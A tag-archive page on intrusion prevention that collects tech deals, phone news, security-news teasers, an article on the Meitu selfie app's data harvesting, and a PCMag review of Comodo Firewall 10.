Home Tags Intrusion Prevention System (IPS)

Tag: Intrusion Prevention System (IPS)

LG Gram review: Amazingly light laptop either needs to be cheaper...

Itrsquo;s a competitive market and others do better on the details.

Save 20% on Amazon’s New Generation of Fire Tablets – Deal...

The all-new Fire 7nbsp;and Fire HD 8nbsp;feature longer battery life, a thinner and lighter body, better Wi-Fi connectivity, and Alexa.
It features a beautiful 7" IPS display with higher contrast and sharper text, a 1.3 GHz quad-core processor, and up to 8 hours of battery life. 8 or 16 GB of internal storage and a microSD slot for up to 256 GB of expandable storage. Amazon has also introduced two new Fire Kids Edition (Fire 7 and Fire HD 8nbsp;Kids Editions).

To go along with the launch, customers who purchase any 3 new generation Fire Tablets save 20% by using the code FIRE3PACK at checkout.
See the full lineup here.To read this article in full or to leave a comment, please click here

Report: Apple is planning a major iPhone overhaul for the fall

One 4.7-inch phone, one 5.5-inch phone, and something totally new.

Lazarus Under The Hood

Today we'd like to share some of our findings, and add something new to what's currently common knowledge about Lazarus Group activities, and their connection to the much talked about February 2016 incident, when an unknown attacker attempted to steal up to $851M USD from Bangladesh Central Bank.

Amazon Discounts its Fire Tablet Bundle an Additional $27.98 With This...

Through this Saturday, sink the 16GB Fire Tablet bundle's already discounted price to just $59.99 using the code FIREBUNDLE at checkout -- a significant deal considering its typical $107.97 value.

The bundle includes the latest 16GB Fire 7" Tablet with special offers ($69.99), Amazon cover ($24.99), and Nupro screen protector ($12.99).

Amazon's newest Fire tablet features a rich 7" IPS display and a 1.3 GHz quad-core processor.
Integrated Alexa service lets you ask away with a button press. Enjoy millions of movies, TV shows, songs, Kindle e-books, apps and games, and enjoy them uninterrupted with Fire's long lasting 7-hour battery.
See this deal on Amazon before it expires by adding to cart and applying FIREBUNDLE at checkout. To read this article in full or to leave a comment, please click here

In-the-wild exploits ramp up against high-impact sites using Apache Struts

Hackers are still exploiting the bug to install malware on high-impact sites.

Moto G5 Plus hands-on: Solid camera, stock Android, sweet price—sign me...

Moto G5 Plus continues the trend of selling last year's tech at under half the price.

Moto G5 hands-on: A solid, metal-ish budget phone with removable battery

Moto G5 gets a fingerprint reader, metal back, and the same svelte £170 price.

Fileless attacks against enterprise networks

This threat was originally discovered by a bank’s security team, after detecting Meterpreter code inside the physical memory of a domain controller (DC). Kaspersky Lab participated in the forensic analysis, discovering the use of PowerShell scripts within the Windows registry.

Additionally it was discovered that the NETSH utility as used for tunnelling traffic from the victim’s host to the attacker´s C2.

Megaviral Meitu “beauty” app’s data grab is anything but skin-deep

reader comments 36 Share this story Enlarge / Our editor, Sebastian, finally achieves self actualisation through technology. Sebastian Anthony A Chinese app which allegedly makes selfies look more attractive—or more like an anime character, at any rate—has a dark secret: it demands permissions for far more personal data than it needs, including users' IMEIs, phone numbers, and GPS coordinates. Meitu, an app which has been out for years on both iOS and Android in China, has shot to fame outside the country in the last few weeks, due to the "beauty" filters it can apply to people's selfies.

Among other functions, it can sharpen people's jaws, put a sparkle in their eyes, and smooth out and lighten their skin. The result? Meitu-filtered pictures are suddenly everywhere.

The backlash, however, has been just as swift. Almost as soon as infosec bods became aware of it, they found numerous serious privacy flaws and avenues for potential leaks of personal data. One eagle-eyed researcher found the Android version of the app asked users for dozens of intrusive permissions, and sends the data to multiple servers in China—including a user's calendar, contacts, SMS messages, external storage, and IMEI number. Take a look at the entire list of permissions from the the Meitu app. pic.twitter.com/AkSw2Z50T7 — FourOctets (@FourOctets) January 19, 2017 The permissions are also out there as well pic.twitter.com/d3GuAVfM7t — FourOctets (@FourOctets) January 19, 2017 The Android version of the app is agreed to be the more insecure, as the OS allows it to seek significantly more permissions, but according to digital forensics expert Jonathan Zdziarski, the app secretly checks to see if a user's iPhone is jailbroken—presumably to see if it can use that information to gather additional data. On its website, the company boasts 1.1 billion installs, as well as 456 million active monthly users around the world. What it doesn't do, however, is give any indication at all about what it does with all the data it collects. Most observers believe the data is being harvested to sell to advertisers.

As Zdziarski added on Twitter, "if you like being the target of marketing and big data, by all means run Meitu.
I’m sure whoever’s buying their data will thank you." "Why would anybody want these IDs?" asked Matthew Garrett of CoreOS. "The simple answer is that app authors mostly make money by selling advertising, and advertisers like to know who's seeing their advertisements.

The more app views they can tie to a single individual, the more they can track that user's response to different kinds of adverts and the more targeted (and, they hope, more profitable) the advertising towards that user. "Using the same ID between multiple apps makes this easier, and so using a device-level ID rather than an app-level one is preferred.

The IMEI is the most stable ID on Android devices, persisting even across factory resets." However, developer Brianna Wu disagreed, and seems to believe the data is being collected for more sinister reasons than invasive advertising.
She claimed Meitu was "predatory," adding: "It's not just a consumer issue, but a national security issue." Whatever their views on the purpose of Meitu's data collection, however, everyone seems to be in agreement about one thing: think very carefully about your personal security before downloading and using the app. Update A Meitu spokesperson claimed to CNET that, because the company is headquartered in China, it was necessary to include the data collection code in the app to circumvent the country's blockage of tracking services from the likes of Apple and Google's app stores.
It said: To get around this, Meitu employs a combination of third-party and in-house data tracking systems to make sure the user data tracked is consistent.

Furthermore, the data collected is sent securely, using multilayer encryption to servers equipped with advanced firewall, IDS and IPS protection to block external attacks. This post originated on Ars Technica UK Listing image by Sebastian Anthony

Comodo Firewall 10

The firewall component in modern versions of Windows is quite effective, so the market for third-party personal firewall utilities is shrinking. Paying for a personal firewall seems especially silly when Windows has one built in.

Comodo Firewall 10 is free, and it does a lot more than the basics.
In addition to protecting your PC against attacks from the Internet and controlling how programs utilize your Internet connection, it includes a secure browser, sandbox-style virtualization, a Host Intrusion Protection System, and more.
It performs all expected personal firewall tasks, but not all of the bonus features worked

Comodo's main competition is Check Point ZoneAlarm Free Firewall 2017, and there are quite a few similarities between the two.

Both companies also offer a free antivirus, for starters.

And you can also get a combined firewall and antivirus from both. With ZoneAlarm, you can convert either the antivirus or firewall to the combined product with just a click. With Comodo, you upgrade to the free edition of Comodo Internet Security.

Shared with Antivirus

The majority of Comodo Firewall's features are also found in Comodo Antivirus 10.
I'll refer you to my review of the antivirus for full details on these features. Here's a summary.

Both Comodo products offer a new, attractive user interface with two similar themes named Lycia and Arcadia.

These two feature a big status panel at left and four button panels at right; they just use slightly different colors and icons.

Those who prefer the previous edition's look can choose the Modern theme.
If you're nostalgic for really old editions of Comodo, the Classic theme gets you that look.
In addition, the main window for both products can display either a Basic View or an Advanced View; the latter puts more statistics and action items in easy reach.

While both Comodo products are free, they also both push you to pay in one way or another. Unless you carefully read all screens and popups, you'll find that without realizing it you've agreed to change all of your browsers to use Yahoo as home page, new tab, and default search engine. You'll see messages offering help from the GeekBuddy tech support system, and indeed a GeekBuddy agent will happily chat with you. However, if you want the tech to perform any kind of remote repair or remediation, you'll have to pay.

Comodo Firewall does not in itself include an antivirus component, but its File Rating component checks files against Comodo's cloud database when you access them.
If the database identifies a process as malware, or as a potentially unwanted program, Comodo terminates the process and pops up a notification. You also get a popup offering GeekBuddy services.

File Rating is also a feature of the antivirus, but in testing I found that other protection layers always kicked in before File Rating had a chance.

Both the firewall and the antivirus can automatically sandbox programs that aren't recognized by the database. However, this feature is enabled by default in the antivirus, disabled in the firewall.

A sandboxed program runs in a virtual environment, unable to permanently change important system areas. When you empty the sandbox, all virtualized changes vanish. You can actively launch any program in the sandbox, or open a fully virtualized desktop, isolated from the regular desktop.
It's similar to the SafePay desktop in Bitdefender Antivirus Plus 2017.

The main feature of the virtualized desktop is the Comodo Dragon browser.

By virtualizing your online transactions, you protect them from manipulation by other processes.

The Dragon browser includes a useful collection of bonus apps, among them a media downloader, a price-comparison tool, and a tool for quickly sharing or searching text from Web pages.

Both Comodo products include a Host Intrusion Prevention System (HIPS), but it's disabled by default in the antivirus, enabled in the firewall.

This is not a tool for foiling attempts to exploit vulnerabilities in the operating system and popular programs. Rather, when it detects suspicious behavior by a program, it asks you what to do. You can allow the behavior, block it, or choose to treat the program in question as an installer.
I tested it with a collection of utilities that share certain behaviors with malware.

Comodo only blocked the installer for one, and when I opted to treat it as an installer, I had no further problem.

The HIPS quite reasonably cast suspicious on a test utility that launches Internet Explorer and forces it to open malware-hosting URLs.

It's worth noting that ZoneAlarm's OSFirewall feature functions in much the same way. When I fully enabled the OSFirewall feature, ZoneAlarm flagged behaviors by both good and bad programs.

While Comodo Firewall isn't an antivirus itself, it includes the option to create an antivirus rescue disk, and the process of creating this disk is quite easy. You can also use it to launch Comodo's cleanup-only tool to wipe out persistent malware.

Firewall Features

As you can see, this product has a lot in common with Comodo Antivirus, but don't worry; there are plenty of firewall-specific functions too.

Each time you connect to a new network, it asks whether it's a home, work, or public network. When you're connected to a public network, Comodo puts all the system's ports in stealth mode, meaning they can't be seen from outside.
It's true that Windows Firewall also accomplishes this feat, but Comodo does it just as well. Unlike Windows Firewall, Comodo lets enthusiasts get an alert on each unsolicited connection attempt.

As noted earlier, Comodo's HIPS feature does not try to block attacks that exploit vulnerabilities in the OS or critical files.

The same is true of ZoneAlarm.
Symantec Norton Security Premium is the champ in this area.
In testing, it blocked more exploits than any other recent product, and it did so at the network level, before the exploit even reached the test system.

When the firewall detects an attempted network connection by a new program, it asks you what to do about it. You can choose to allow the attempt, block it, or treat the suspect program as a browser or FTP client.
If you choose to block access, you can also terminate the program, or terminate it and reverse its actions.

Testing Comodo with my hand-coded browser, I found the firewall query appeared only after three distinct warnings from the HIPS.
I also tried a few leak tests, programs that attempt to evade firewall control by manipulating or masquerading as trusted programs.

These triggered plenty of HIPS warnings, as well as firewall warnings.
I had to turn off the File Rating component for this test, because it terminated them as potentially unwanted programs.

While Comodo's HIPS and firewall popups aren't as overwhelming as they were a few versions ago, they still give the user a lot to consider. Most user really won't know whether a program should be allowed to access the DNS/RPC Client service, or access a protected COM interface.

The firewall components in Norton and Kaspersky Internet Security track suspicious behaviors, but perform their own internal analysis rather than expecting the user to make complex security decisions.

ZoneAlarm pioneered the concept that a personal firewall must defend itself against attack.
If malware can disable firewall protection programmatically, the protection isn't worth much, right? I couldn't find any Registry entry that would serve as an off switch for Comodo Firewall, and when I tried to terminate its process I got an Access Denied message.

Security products typically rely on one or more Windows services as well—Comodo has four.
I found that I could stop three of them, but not the fourth, the most essential one. However, I managed to set its startup mode to Disabled. On reboot, Comodo offered to fix the problem, after which it was fine.
Still, I'm happier with a product like ZoneAlarm or Norton that simply prevents all modification of its Windows services.

Website Filtering

Many antivirus products include a browser-protection component that helps steer users away from malicious or fraudulent URLs.

Comodo Antivirus does not. However, the firewall adds a component called Website Filtering. My contact at the company explained that Website Filtering blocks access to URLs found in Comodo's malicious URL database, but does not attempt to block phishing sites.

To evaluate this component's efficacy, I launched the malicious URL blocking test that I apply to each antivirus.

This test uses a feed of very new malware-hosting URLs supplied by MRG-Effitas.
I use URLs discovered in the last day or two, so they're very new.
I launch each one and note whether the product blocked access to the dangerous URL, wiped out the malicious payload, or completely ignored the danger.

Normally I keep at this test until I have data for 100 malware-hosting URLs. However, after processing 50 without any response from Comodo, I quit.
I suspect that Comodo's blacklist database of malicious URLs isn't updated frequently enough to detect the most recent dangers.

By contrast, Avira Antivirus blocked 93 percent of the URLs in this test.

Does the Job

Comodo Firewall 10 does everything a personal firewall should do, stealthing ports against outside attack and preventing betrayal from within by programs misusing your Internet connection.
In addition, it offers sandboxing, a secure browser, HIPS, reputation-based file rating, and more. However, some of these bonus features are too techie for the average user, and they don't all contribute to the task of a personal firewall.

Our Editors' Choice in the dwindling collection of free personal firewalls is Check Point ZoneAlarm Free Firewall 2017.
It, too, handles all the basic tasks, and it resists direct attack better than Comodo.
It does offer a collection of bonus features as well, but most are easier for the average user to comprehend.

For the tech expert, Comodo can be great, make no mistake.

But ZoneAlarm is better suited for the average user.

Back to top

PCMag may earn affiliate commissions from the shopping links included on this page.

These commissions do not affect how we test, rate or review products.

To find out more, read our complete terms of use.

Comodo Antivirus 10

Some antivirus vendors release a new version every year, with or without the coming year as part of the product name. Others, like Comodo, follow a simple version-number scheme, releasing a new version when it's ready. With Comodo Antivirus 10 the com...